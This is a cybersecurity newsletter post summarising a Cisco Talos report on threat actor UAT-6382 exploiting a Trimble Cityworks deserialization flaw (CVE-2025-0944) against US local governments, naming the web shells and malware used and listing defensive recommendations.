• Cyber Syrup
  • Posts
  • UAT-6382 Exploits Trimble Cityworks Flaw to Deploy Cobalt Strike and VShell

UAT-6382 Exploits Trimble Cityworks Flaw to Deploy Cobalt Strike and VShell

A newly identified threat actor, UAT-6382, has been linked to a cyber campaign exploiting a critical vulnerability in Trimble Cityworks—an asset management software commonly used by local governments in the United States

May 23, 2025

In partnership with

CYBER SYRUP
Delivering the sweetest insights on cybersecurity.

Learn AI in 5 minutes a day

This is the easiest way for a busy person wanting to learn AI in as little time as possible:

  1. Sign up for The Rundown AI newsletter

  2. They send you 5-minute email updates on the latest AI news and how to use it

  3. You learn how to become 2x more productive by leveraging AI

UAT-6382 Exploits Trimble Cityworks Flaw to Deploy Cobalt Strike and VShell

A newly identified threat actor, UAT-6382, has been linked to a cyber campaign exploiting a critical vulnerability in Trimble Cityworks—an asset management software commonly used by local governments in the United States. The attack, attributed to a Chinese-speaking group, was discovered by researchers at Cisco Talos and has raised concerns due to its methodical exploitation tactics and use of custom malware.

What Is Trimble Cityworks?

Trimble Cityworks is a GIS-centric asset and work management platform used widely by municipalities for utility services and infrastructure maintenance. Its integration into essential civic operations makes it a valuable target for cyber threat actors seeking to disrupt or surveil public services.

The Vulnerability: CVE-2025-0944

The attack campaign hinges on a critical flaw—CVE-2025-0944—a deserialization of untrusted data vulnerability. This security issue allows attackers to execute arbitrary code remotely on vulnerable systems. It received a CVSS score of 8.6, highlighting its severity, and was added to the CISA Known Exploited Vulnerabilities (KEV) catalog in February 2025.

Technical Summary

  • CVE Identifier: CVE-2025-0944

  • Impact: Remote Code Execution (RCE)

  • Severity: High (CVSS 8.6)

  • Affected Software: Trimble Cityworks (now patched)

  • Attack Vector: Deserialization of untrusted input

Attack Timeline and Objectives

According to Cisco Talos, attacks began in January 2025, targeting the enterprise networks of U.S. local governments. Once access was gained through exploitation of the vulnerability, UAT-6382 conducted reconnaissance activities aimed at identifying systems involved in utility management—a clear indication of strategic targeting.

Key Actions Performed by UAT-6382:

  1. Exploited CVE-2025-0944 to gain access

  2. Conducted reconnaissance to identify utility-related systems

  3. Deployed web shells and malware for persistence

  4. Pivoted laterally within the network using PowerShell-based delivery mechanisms

Malware and Tools Used

UAT-6382 used a combination of open-source tools and custom-built malware to achieve and maintain persistence in compromised environments.

Web Shells

The attackers installed several well-known web shells commonly used by Chinese-speaking hacking groups, including:

  • AntSword

  • Chopper (chinatso/Chopper)

  • Behinder

These shells provided UAT-6382 with backdoor access, allowing for command execution and file manipulation directly through web interfaces.

Malware Loaders and RATs

  • TetraLoader: A Rust-based malware loader used to deploy other malicious payloads. It is based on MaLoader, a malware framework built in Simplified Chinese.

  • Cobalt Strike: A widely-used penetration testing tool often repurposed by cybercriminals for command-and-control (C2) operations.

  • VShell: A Go-based remote access tool used to maintain long-term access to the infected environment.

These tools enabled the attackers to perform lateral movement, exfiltrate data, and potentially monitor operational utility systems.

Exfiltration and Persistence Techniques

Once inside the system, UAT-6382 took steps to identify directories and files of interest, particularly those related to infrastructure operations. Files were staged in known directories associated with the deployed web shells to facilitate quick and covert data exfiltration.

Additional Techniques:

  • Directory enumeration to identify high-value targets

  • Use of PowerShell to download and install multiple backdoors

  • File staging for streamlined data theft

Implications and Recommendations

The exploitation of a critical vulnerability in software that supports civic infrastructure represents a serious threat to public services and local government operations. The campaign's strategic focus on utility management underscores the importance of safeguarding critical infrastructure.

Who Should Be Concerned?

  • Local governments

  • Utility service providers

  • Public sector IT administrators

  • Organizations using Trimble Cityworks

How to Defend Against This Threat

  • Patch immediately: Ensure all instances of Trimble Cityworks are updated to the latest version.

  • Monitor for IoCs: Refer to Trimble’s and Cisco Talos’ published indicators of compromise (IoCs).

  • Restrict PowerShell use: Apply policy-based restrictions on PowerShell execution.

  • Deploy endpoint monitoring tools: Utilize EDR solutions to detect unauthorized lateral movement and malware deployments.

  • Conduct security audits: Review existing web-facing assets for other potential deserialization or remote-code-execution flaws.

Conclusion

UAT-6382’s exploitation of Trimble Cityworks marks another instance of sophisticated cyber campaigns targeting municipal infrastructure. Through strategic exploitation, persistent access tools, and methodical reconnaissance, this campaign highlights the evolving threat landscape and the growing need for proactive defense in the public sector.